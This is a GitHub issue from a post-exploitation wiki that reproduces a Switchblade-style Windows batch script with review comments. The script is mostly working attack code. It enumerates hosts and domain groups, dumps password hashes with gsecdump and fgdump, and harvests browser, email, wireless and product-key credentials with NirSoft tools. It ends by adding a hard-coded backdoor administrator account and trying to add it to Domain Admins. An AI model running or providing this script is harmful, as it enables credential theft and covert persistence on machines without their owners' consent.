mubix / post-exploitation-wiki

Post Exploitation Wiki

Cherry pick the "good" stuff out of the old Hak5 Switchblade commands #54

Open mubix opened 10 years ago

mubix commented 10 years ago

Source of the script reproduced below: http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html

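::start of file
@echo off
:: Switchblade-style collection script. Everything is written under
:: <drive>\switchblade\dump\<computername>\ and every helper binary is run from
:: <drive>\switchblade\tools\. The drive is taken from the script's own
:: location so the paths still resolve when cmd was started with a different
:: current drive.
set "SB_BASE=%~d0\switchblade"
set "SB_TOOLS=%SB_BASE%\tools"
set "SB_DUMP=%SB_BASE%\dump\%computername%"
set "NET_LOG=%SB_DUMP%\%computername%-net.log"
set "USER_LOG=%SB_DUMP%\%computername%-user.log"
set "PC_LOG=%SB_DUMP%\%computername%-PC.log"
set "BROWSER_LOG=%SB_DUMP%\%computername%_browser.log"
:: one line that stamps each log with host, user and time
set "STAMP=Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time%"
::create the per-host dump directory
if not exist "%SB_BASE%\dump" md "%SB_BASE%\dump" >nul
if not exist "%SB_DUMP%" md "%SB_DUMP%" >nul
:: all tools below are called relative to the tools directory; stop early if it
:: is missing instead of silently running nothing
cd /d "%SB_TOOLS%" || exit /b 1
::network view: interfaces, routes, DNS cache, sockets, firewall state, ARP, SMB sessions
echo %STAMP% >> "%NET_LOG%" 2>&1
ipconfig /all >> "%NET_LOG%" 2>&1
route print >> "%NET_LOG%" 2>&1
ipconfig /displaydns >> "%NET_LOG%" 2>&1
netstat -anbv >> "%NET_LOG%" 2>&1
netsh diag show all /v >> "%NET_LOG%" 2>&1
:: NOTE(review): the "netsh firewall" context is the legacy one; on newer
:: Windows the equivalent data lives under "netsh advfirewall" - confirm on target
netsh firewall show conf >> "%NET_LOG%" 2>&1
netsh firewall show port >> "%NET_LOG%" 2>&1
arp -a >> "%NET_LOG%" 2>&1
net session >> "%NET_LOG%" 2>&1
::user and group view: local and domain group membership, policy, logon sessions, hashes
echo %STAMP% >> "%USER_LOG%" 2>&1
net view >> "%USER_LOG%" 2>&1
net share >> "%USER_LOG%" 2>&1
net accounts >> "%USER_LOG%" 2>&1
net localgroup >> "%USER_LOG%" 2>&1
net localgroup /domain >> "%USER_LOG%" 2>&1
net localgroup administrators /domain >> "%USER_LOG%" 2>&1
net group "domain admins" /domain >> "%USER_LOG%" 2>&1
net group "backup operators" /domain >> "%USER_LOG%" 2>&1
net group "domain users" /domain >> "%USER_LOG%" 2>&1
gpresult >> "%USER_LOG%" 2>&1
.\whosthere.exe >> "%USER_LOG%" 2>&1
.\whosthere-alt.exe >> "%USER_LOG%" 2>&1
:: gsecdump output now goes to the same user log; the original wrote it to a
:: file without the .log extension
.\gsecdump.exe -a >> "%USER_LOG%" 2>&1
::dump other PC info: services, environment, full file tree
echo %STAMP% >> "%PC_LOG%" 2>&1
net start >> "%PC_LOG%" 2>&1
:: NOTE: this also records the SB_ variables defined above
set >> "%PC_LOG%" 2>&1
tree /f >> "%PC_LOG%" 2>&1
::slurp Browser info
echo %STAMP% >> "%BROWSER_LOG%" 2>&1
cscript //nologo .\iehistquick.vbs >> "%BROWSER_LOG%" 2>&1
:: NOTE(review): a 32-bit Firefox on 64-bit Windows installs under the x86
:: Program Files directory, which this test does not cover
IF EXIST "%ProgramFiles%\Mozilla Firefox\firefox.exe" .\FirePassword.exe >> "%BROWSER_LOG%" 2>&1
echo ***********[End Of File]************ >> "%BROWSER_LOG%" 2>&1
::create the NirSoft html reports. Several of these tools are classified as
::hacktools by AV and will be killed, which aborts the script at that point;
::the original workflow relied on an AV-killer running first.
nircmd.exe exec2 hide "%SB_DUMP%" "%SB_TOOLS%\fgdump.exe" -s -r -k
nircmd.exe execmd mylastsearch.exe /shtml "%SB_DUMP%\InternetSearch.html"
nircmd.exe execmd pspv.exe /shtml "%SB_DUMP%\IEPassword.html"
nircmd.exe execmd iepv.exe /shtml "%SB_DUMP%\IEProtected.html"
nircmd.exe execmd nk2view.exe /shtml "%SB_DUMP%\recentEmail.html"
nircmd.exe execmd recentfilesview.exe /shtml "%SB_DUMP%\recentfiles.html"
IF EXIST "%ProgramFiles%\Mozilla Firefox\firefox.exe" nircmd.exe execmd passwordfox.exe /shtml "%SB_DUMP%\FFPassword.html"
nircmd.exe execmd USBDeview.exe /shtml "%SB_DUMP%\USB.html"
nircmd.exe execmd mspassSLURP.exe /shtml "%SB_DUMP%\msn.html"
nircmd.exe execmd netpass.exe /shtml "%SB_DUMP%\netpassword.html"
nircmd.exe execmd iehv.exe /shtml "%SB_DUMP%\IEhistory.html"
nircmd.exe execmd ProduKey.exe /shtml "%SB_DUMP%\keys.html"
nircmd.exe execmd MozillaHistoryView.exe /shtml "%SB_DUMP%\FFXHistory.html"
nircmd.exe execmd WirelessKeyView.exe /shtml "%SB_DUMP%\Wireless.html"
nircmd.exe execmd mailpv.exe /shtml "%SB_DUMP%\mail.html"
nircmd.exe execmd mzcv.exe /shtml "%SB_DUMP%\FFXCookie.html"
nircmd.exe execmd cports.exe /shtml "%SB_DUMP%\OpenPorts.html"
nircmd.exe execmd chromepass.exe /shtml "%SB_DUMP%\ChromePass.html"
:: chromecacheview gets its own file; the original reused ChromePass.html and
:: overwrote the chromepass report
nircmd.exe execmd chromecacheview.exe /shtml "%SB_DUMP%\ChromeCache.html"
nircmd.exe execmd OpenedFilesView.exe /shtml "%SB_DUMP%\openfiles.html"
nircmd.exe execmd wul.exe /shtml "%SB_DUMP%\updates-bugfixes.html"
nircmd.exe execmd dialupass2.exe /shtml "%SB_DUMP%\DialUp2.html"
::finally if we didnt get caught
::persistence: a local admin account with a hard-coded password. The password
::is a fixed string shipped with the tool, so anyone who knows it can log on to
::every host this was run against; it is also the loudest step in the script.
::NOTE(review): "net group" without /domain is only valid on a domain
::controller, and adding to Domain Admins needs domain-admin rights, so the
::last line is expected to fail on an ordinary workstation.
net user helpdeskadmin Password!@#$ /add
net localgroup Administrators helpdeskadmin /add
net group "domain admins" helpdeskadmin /add
exit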